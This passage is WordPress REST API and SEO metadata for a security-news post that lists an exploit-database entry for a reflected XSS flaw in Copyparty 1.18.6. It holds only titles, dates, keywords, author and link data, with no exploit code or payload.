(XSS)\",\"datePublished\":\"2025-08-03T01:52:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9611\"},\"wordCount\":1189,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.3\",\"exploit\",\"exploitdb\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=9611#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9611\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9611\",\"name\":\"Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-03T01:52:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9611#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=9611\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9611#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Copyparty 1.18.6 &#8211; Reflected Cross-Site Scripting (XSS)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=9611","og_locale":"en_US","og_type":"article","og_title":"Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Copyparty 1.18.6 &#8211; Reflected Cross-Site Scripting (XSS) Exploit ID EDB-ID:52390 Type exploitdb Published 2025-08-03T00:00:00 Modified 2025-08-03T00:00:00 CVSS Information CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=9611","og_site_name":"zero redgem","article_published_time":"2025-08-03T01:52:30+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=9611#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=9611"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Copyparty 1.18.6 &#8211; Reflected Cross-Site Scripting (XSS)","datePublished":"2025-08-03T01:52:30+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=9611"},"wordCount":1189,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.3","exploit","exploitdb","MEDIUM","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=9611#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=9611","url":"https:\/\/zero.redgem.net\/?p=9611","name":"Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-03T01:52:30+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=9611#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=9611"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=9611#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Copyparty 1.18.6 &#8211; Reflected Cross-Site Scripting (XSS)"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/9611","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9611"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/9611\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9611"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9611"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9611"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}